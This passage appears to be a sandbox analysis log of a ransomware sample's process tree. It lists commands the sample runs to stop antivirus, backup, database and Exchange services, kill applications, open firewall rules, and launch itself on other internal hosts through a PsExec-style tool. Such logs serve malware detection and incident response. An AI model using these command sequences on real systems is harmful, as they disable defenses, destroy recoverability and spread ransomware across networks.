  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SstpSvc /y
      4⤵
      PID:896
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$ECWDB2 /y
    3⤵
    PID:5152
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y
      4⤵
      PID:3796
- - C:\Windows\system32\net.exe
    "net.exe" stop MSExchangeIS /y
    3⤵
    PID:5700
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSExchangeIS /y
      4⤵
      PID:4988
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
        5⤵
        
        PID:5472
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$SBSMONITORING /y
    3⤵
    PID:1580
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y
      4⤵
      PID:4532
- - C:\Windows\system32\net.exe
    "net.exe" stop MSExchangeMTA /y
    3⤵
    PID:3192
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos AutoUpdate Service” /y
    3⤵
    PID:2988
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos AutoUpdate Service” /y
      4⤵
      PID:2084
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos Device Control Service” /y
    3⤵
    PID:4728
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos Device Control Service” /y
      4⤵
      PID:5200
- - C:\Windows\system32\net.exe
    "net.exe" stop SntpService /y
    3⤵
    PID:5928
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SntpService /y
      4⤵
      PID:4560
- - C:\Windows\system32\net.exe
    "net.exe" stop SamSs /y
    3⤵
    PID:5296
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SamSs /y
      4⤵
      PID:4128
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$SYSTEM_BGC /y
    3⤵
    PID:5508
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y
      4⤵
      PID:5436
- - C:\Windows\system32\net.exe
    "net.exe" stop ReportServer$SYSTEM_BGC /y
    3⤵
    PID:4812
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y
      4⤵
      PID:3052
- - C:\Windows\system32\net.exe
    "net.exe" stop ReportServer /y
    3⤵
    PID:4016
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ReportServer /y
      4⤵
      PID:2076
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$SHAREPOINT /y
    3⤵
    PID:2208
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y
      4⤵
      PID:2272
- - C:\Windows\system32\net.exe
    "net.exe" stop swi_filter /y
    3⤵
    PID:1808
- - C:\Windows\system32\net.exe
    "net.exe" stop “SQLsafe Backup Service” /y
    3⤵
    PID:5828
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “SQLsafe Backup Service” /y
      4⤵
      PID:4668
- - C:\Windows\system32\net.exe
    "net.exe" stop sophossps /y
    3⤵
    PID:2168
- - C:\Windows\system32\net.exe
    "net.exe" stop “Symantec System Recovery” /y
    3⤵
    PID:4800
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Symantec System Recovery” /y
      4⤵
      PID:4724
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop audioendpointbuilder /y
      4⤵
      PID:4208
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$TPS /y
    3⤵
    PID:4896
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$TPS /y
      4⤵
      PID:5052
- - C:\Windows\system32\net.exe
    "net.exe" stop MsDtsServer110 /y
    3⤵
    PID:572
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MsDtsServer110 /y
      4⤵
      PID:5316
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$SQL_2008 /y
    3⤵
    PID:5280
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y
      4⤵
      PID:5012
- - C:\Windows\system32\net.exe
    "net.exe" stop POP3Svc /y
    3⤵
    PID:5164
- - C:\Windows\system32\net.exe
    "net.exe" stop swi_service /y
    3⤵
    PID:5168
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop swi_service /y
      4⤵
      PID:5608
- - C:\Windows\system32\net.exe
    "net.exe" stop UI0Detect /y
    3⤵
    PID:4748
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop UI0Detect /y
      4⤵
      PID:5728
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$SOPHOS /y
    3⤵
    PID:3780
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$SOPHOS /y
      4⤵
      PID:2740
- - C:\Windows\system32\net.exe
    "net.exe" stop MSExchangeMGMT /y
    3⤵
    PID:4520
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSExchangeMGMT /y
      4⤵
      PID:4876
- - C:\Windows\system32\net.exe
    "net.exe" stop MSExchangeSA /y
    3⤵
    PID:4956
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSExchangeSA /y
      4⤵
      PID:252
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$TPSAMA /y
    3⤵
    PID:5680
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$TPSAMA /y
      4⤵
      PID:6008
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos Clean Service” /y
    3⤵
    PID:5732
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos Clean Service” /y
      4⤵
      PID:5244
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$SQLEXPRESS /y
    3⤵
    PID:5676
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y
      4⤵
      PID:6060
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos File Scanner Service” /y
    3⤵
    PID:5084
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos File Scanner Service” /y
      4⤵
      PID:5844
- - C:\Windows\system32\net.exe
    "net.exe" stop SMTPSvc /y
    3⤵
    PID:4712
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SMTPSvc /y
      4⤵
      PID:2596
- - C:\Windows\system32\net.exe
    "net.exe" stop swi_update /y
    3⤵
    PID:5996
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop swi_update /y
      4⤵
      PID:5448
- - C:\Windows\system32\net.exe
    "net.exe" stop ReportServer$TPS /y
    3⤵
    PID:4608
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ReportServer$TPS /y
      4⤵
      PID:3188
- - C:\Windows\system32\net.exe
    "net.exe" stop svcGenericHost /y
    3⤵
    PID:800
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop svcGenericHost /y
      4⤵
      PID:5320
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
    3⤵
    PID:4796
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
      4⤵
      PID:4380
- - C:\Windows\system32\net.exe
    "net.exe" stop ReportServer$SQL_2008 /y
    3⤵
    PID:4988
- - C:\Windows\system32\net.exe
    "net.exe" stop “Veeam Backup Catalog Data Service” /y
    3⤵
    PID:5668
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Veeam Backup Catalog Data Service” /y
      4⤵
      PID:248
- - C:\Windows\system32\net.exe
    "net.exe" stop swi_update_64 /y
    3⤵
    PID:6092
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop swi_update_64 /y
      4⤵
      PID:4316
- - C:\Windows\system32\net.exe
    "net.exe" stop “SQLsafe Filter Service” /y
    3⤵
    PID:5412
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “SQLsafe Filter Service” /y
      4⤵
      PID:4884
- - C:\Windows\system32\net.exe
    "net.exe" stop MSOLAP$SYSTEM_BGC /y
    3⤵
    PID:1896
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y
      4⤵
      PID:4640
- - C:\Windows\system32\net.exe
    "net.exe" stop TrueKeyServiceHelper /y
    3⤵
    PID:4588
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop TrueKeyServiceHelper /y
      4⤵
      PID:4436
- - C:\Windows\system32\net.exe
    "net.exe" stop ReportServer$TPSAMA /y
    3⤵
    PID:5652
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ReportServer$TPSAMA /y
      4⤵
      PID:4348
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$VEEAMSQL2012 /y
    3⤵
    PID:5200
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y
      4⤵
      PID:4472
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLTELEMETRY /y
    3⤵
    PID:5612
- - C:\Windows\system32\net.exe
    "net.exe" stop W3Svc /y
    3⤵
    PID:5456
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop W3Svc /y
      4⤵
      PID:4120
- - C:\Windows\system32\net.exe
    "net.exe" stop “Zoolz 2 Service” /y
    3⤵
    PID:6080
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Zoolz 2 Service” /y
      4⤵
      PID:4780
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLTELEMETRY$ECWDB2 /y
    3⤵
    PID:5408
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y
      4⤵
      PID:5484
- - C:\Windows\system32\net.exe
    "net.exe" stop MSOLAP$TPS /y
    3⤵
    PID:4164
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSOLAP$TPS /y
      4⤵
      PID:4440
- - C:\Windows\system32\net.exe
    "net.exe" stop TmCCSF /y
    3⤵
    PID:2260
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop TmCCSF /y
      4⤵
      PID:1436
- - C:\Windows\system32\net.exe
    "net.exe" stop MSExchangeSRS /y
    3⤵
    PID:2136
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSExchangeSRS /y
      4⤵
      PID:4064
- - C:\Windows\system32\net.exe
    "net.exe" stop WRSVC /y
    3⤵
    PID:5856
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop WRSVC /y
      4⤵
      PID:5272
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLBrowser /y
    3⤵
    PID:4648
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLBrowser /y
      4⤵
      PID:4480
- - C:\Windows\system32\net.exe
    "net.exe" stop “aphidmonitorservice” /y
    3⤵
    PID:4504
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “aphidmonitorservice” /y
      4⤵
      PID:4408
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos Health Service” /y
    3⤵
    PID:4836
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos Health Service” /y
      4⤵
      PID:4368
- - C:\Windows\system32\net.exe
    "net.exe" stop tmlisten /y
    3⤵
    PID:5420
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop tmlisten /y
      4⤵
      PID:5728
- - C:\Windows\system32\net.exe
    "net.exe" stop msexchangeadtopology /y
    3⤵
    PID:2980
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop msexchangeadtopology /y
      4⤵
      PID:4400
- - C:\Windows\system32\net.exe
    "net.exe" stop mssql$vim_sqlexp /y
    3⤵
    PID:4556
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop mssql$vim_sqlexp /y
      4⤵
      PID:3700
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$ECWDB2 /y
    3⤵
    PID:3152
- - C:\Windows\system32\net.exe
    "net.exe" stop vapiendpoint /y
    3⤵
    PID:4576
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop vapiendpoint /y
      4⤵
      PID:4432
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos MCS Agent” /y
    3⤵
    PID:1808
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos MCS Agent” /y
      4⤵
      PID:1776
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop swi_filter /y
      4⤵
      PID:1436
- - C:\Windows\system32\net.exe
    "net.exe" stop audioendpointbuilder /y
    3⤵
    PID:4800
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$SBSMONITORING /
    3⤵
    PID:4288
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /
      4⤵
      PID:988
- - C:\Windows\system32\net.exe
    "net.exe" stop AcrSch2Svc /y
    3⤵
    PID:4268
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop AcrSch2Svc /y
      4⤵
      PID:256
- - C:\Windows\system32\net.exe
    "net.exe" stop TrueKey /y
    3⤵
    PID:4548
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop TrueKey /y
      4⤵
      PID:264
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$SBSMONITORING /y
    3⤵
    PID:5536
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y
      4⤵
      PID:240
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLSafeOLRService /y
    3⤵
    PID:4732
- - C:\Windows\system32\net.exe
    "net.exe" stop MSOLAP$TPSAMA /y
    3⤵
    PID:6024
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSOLAP$TPSAMA /y
      4⤵
      PID:5524
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLSERVERAGENT /y
    3⤵
    PID:4168
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLSERVERAGENT /y
      4⤵
      PID:5992
- - C:\Windows\system32\net.exe
    "net.exe" stop AVP /y
    3⤵
    PID:3796
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop AVP /y
      4⤵
      PID:5480
- - C:\Windows\system32\net.exe
    "net.exe" stop TrueKeyScheduler /y
    3⤵
    PID:1068
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop TrueKeyScheduler /y
      4⤵
      PID:5152
- - C:\Windows\system32\net.exe
    "net.exe" stop “intel(r) proset monitoring service” /y
    3⤵
    PID:5468
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “intel(r) proset monitoring service” /y
      4⤵
      PID:4204
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecVSSProvider /y
    3⤵
    PID:2772
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecVSSProvider /y
      4⤵
      PID:5832
- - C:\Windows\system32\net.exe
    "net.exe" stop msexchangeimap4 /y
    3⤵
    PID:4332
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop msexchangeimap4 /y
      4⤵
      PID:804
- - C:\Windows\system32\net.exe
    "net.exe" stop MSOLAP$SQL_2008 /y
    3⤵
    PID:5036
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$SHAREPOINT /y
    3⤵
    PID:5768
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y
      4⤵
      PID:5640
- - C:\Windows\system32\net.exe
    "net.exe" stop SAVService /y
    3⤵
    PID:6068
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos MCS Client” /y
    3⤵
    PID:4660
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos MCS Client” /y
      4⤵
      PID:6068
- - C:\Windows\system32\net.exe
    "net.exe" stop DCAgent /y
    3⤵
    PID:4940
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop DCAgent /y
      4⤵
      PID:5660
- - C:\Windows\system32\net.exe
    "net.exe" stop ARSM /y
    3⤵
    PID:3516
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ARSM /y
      4⤵
      PID:6004
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$BKUPEXEC /y
    3⤵
    PID:5384
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y
      4⤵
      PID:5208
- - C:\Windows\system32\net.exe
    "net.exe" stop unistoresvc_1af40a /y
    3⤵
    PID:5028
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop unistoresvc_1af40a /y
      4⤵
      PID:4792
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
    3⤵
    PID:4444
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos Message Router” /y
    3⤵
    PID:5888
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos Message Router” /y
      4⤵
      PID:4336
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecAgentAccelerator /y
    3⤵
    PID:5484
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
      4⤵
      PID:5008
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
    3⤵
    PID:5504
- - C:\Windows\system32\arp.exe
    "arp" -a
    3⤵
    PID:5144
- - C:\Windows\TEMP\xp2cek0m.exe
    "C:\Windows\TEMP\xp2cek0m.exe" \\10.10.0.11 -d -h -s -f -accepteula -nobanner -c "C:\Windows\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"
    3⤵
    PID:260
- - C:\Windows\TEMP\xp2cek0m.exe
    "C:\Windows\TEMP\xp2cek0m.exe" \\10.10.0.33 -d -h -s -f -accepteula -nobanner -c "C:\Windows\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"
    3⤵
    PID:4512
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
    3⤵
    PID:5072
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos Safestore Service” /y
    3⤵
    PID:4148
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos Safestore Service” /y
      4⤵
      PID:5552
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecAgentBrowser /y
    3⤵
    PID:4536
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
      4⤵
      PID:4908
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$PRACTICEMGT /y
    3⤵
    PID:6124
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y
      4⤵
      PID:4644
- - C:\Windows\TEMP\xp2cek0m.exe
    "C:\Windows\TEMP\xp2cek0m.exe" \\10.10.0.36 -d -h -s -f -accepteula -nobanner -c "C:\Windows\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"
    3⤵
    PID:5656
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
    3⤵
    PID:5540
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos System Protection Service” /y
    3⤵
    PID:4972
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos System Protection Service” /y
      4⤵
      PID:5456
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecDeviceMediaService /y
    3⤵
    PID:2136
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y
      4⤵
      PID:6092
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$PRACTTICEBGC /y
    3⤵
    PID:1776
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y
      4⤵
      PID:5364
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos Web Control Service” /y
    3⤵
    PID:4340
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos Web Control Service” /y
      4⤵
      PID:5568
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecJobEngine /y
    3⤵
    PID:4680
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecJobEngine /y
      4⤵
      PID:5280
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$PROD /y
    3⤵
    PID:1700
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$PROD /y
      4⤵
      PID:6016
- - C:\Windows\system32\net.exe
    "net.exe" stop AcronisAgent /y
    3⤵
    PID:2208
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop AcronisAgent /y
      4⤵
      PID:6060
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecManagementService /y
    3⤵
    PID:5588
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecManagementService /y
      4⤵
      PID:6012
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$PROFXENGAGEMENT /y
    3⤵
    PID:5244
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y
      4⤵
      PID:5176
- - C:\Windows\system32\net.exe
    "net.exe" stop Antivirus /y
    3⤵
    PID:4216
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop Antivirus /y
      4⤵
      PID:5820
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecRPCService /y
    3⤵
    PID:2760
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecRPCService /y
      4⤵
      PID:5288
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mspub.exe /F
    3⤵
    PID:5864
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mydesktopqos.exe /F
    3⤵
    - Kills process with taskkill
    PID:1664
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mydesktopservice.exe /F
    3⤵
    PID:5068
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mysqld.exe /F
    3⤵
    PID:5584
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqbcoreservice.exe /F
    3⤵
    - Kills process with taskkill
    PID:5032
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM firefoxconfig.exe /F
    3⤵
    PID:4124
- - C:\Windows\TEMP\xp2cek0m.exe
    "C:\Windows\TEMP\xp2cek0m.exe" \\10.10.0.21 -d -h -s -f -accepteula -nobanner -c "C:\Windows\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"
    3⤵
    PID:5740
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM agntsvc.exe /F
    3⤵
    PID:1820
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM thebat.exe /F
    3⤵
    PID:5464
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM steam.exe /F
    3⤵
    - Kills process with taskkill
    PID:348
- - C:\Windows\TEMP\xp2cek0m.exe
    "C:\Windows\TEMP\xp2cek0m.exe" \\10.10.0.24 -d -h -s -f -accepteula -nobanner -c "C:\Windows\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"
    3⤵
    PID:6004
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM encsvc.exe /F
    3⤵
    PID:5224
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM excel.exe /F
    3⤵
    PID:4460
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM CNTAoSMgr.exe /F
    3⤵
    PID:2228
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqlwriter.exe /F
    3⤵
    PID:5648
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM tbirdconfig.exe /F
    3⤵
    - Kills process with taskkill
    PID:4808
- - C:\Windows\TEMP\xp2cek0m.exe
    "C:\Windows\TEMP\xp2cek0m.exe" \\10.10.0.14 -d -h -s -f -accepteula -nobanner -c "C:\Windows\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"
    3⤵
    PID:2272
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM dbeng50.exe /F
    3⤵
    PID:4488
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mspub.exe /F
    3⤵
    PID:5384
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM thebat64.exe /F
    3⤵
    - Kills process with taskkill
    PID:1468
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM Ntrtscan.exe /F
    3⤵
    PID:5536
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\Users
    3⤵
    PID:4772
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM isqlplussvc.exe /F
    3⤵
    - Kills process with taskkill
    PID:4692
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM ocomm.exe /F
    3⤵
    PID:468
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\A$
    3⤵
    PID:3700
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.10\Users
    3⤵
    PID:5432
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\B$
    3⤵
    PID:5020
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM infopath.exe /F
    3⤵
    PID:2260
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM onenote.exe /F
    3⤵
    PID:5856
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\C$
    3⤵
    PID:6092
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\D$
    3⤵
    PID:4520
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mbamtray.exe /F
    3⤵
    - Kills process with taskkill
    PID:5420
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM PccNTMon.exe /F
    3⤵
    - Kills process with taskkill
    PID:4176
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\E$
    3⤵
    PID:4152
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM zoolz.exe /F
    3⤵
    - Kills process with taskkill
    PID:5168
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM msaccess.exe /F
    3⤵
    - Kills process with taskkill
    PID:988
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\F$
    3⤵
    PID:4736
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\G$
    3⤵
    PID:6096
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" IM thunderbird.exe /F
    3⤵
    - Kills process with taskkill
    PID:5332
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM dbsnmp.exe /F
    3⤵
    PID:264
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\H$
    3⤵
    PID:5516
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM outlook.exe /F
    3⤵
    - Kills process with taskkill
    PID:5844
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM xfssvccon.exe /F
    3⤵
    - Kills process with taskkill
    PID:2760
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\I$
    3⤵
    PID:5996
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM tmlisten.exe /F
    3⤵
    - Kills process with taskkill
    PID:5480
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM wordpad.exe /F
    3⤵
    - Kills process with taskkill
    PID:3152
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\J$
    3⤵
    PID:2980
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\K$
    3⤵
    PID:5304
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM msftesql.exe /F
    3⤵
    PID:4716
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mysqld-opt.exe /F
    3⤵
    - Kills process with taskkill
    PID:1800
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\L$
    3⤵
    PID:5096
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\M$
    3⤵
    PID:4196
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM powerpnt.exe /F
    3⤵
    PID:5772
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM ocautoupds.exe /F
    3⤵
    PID:4348
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\N$
    3⤵
    PID:6072
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\O$
    3⤵
    PID:3860
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM ocssd.exe /F
    3⤵
    - Kills process with taskkill
    PID:4868
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mydesktopqos.exe /F
    3⤵
    PID:5740
- - C:\Windows\system32\net.exe
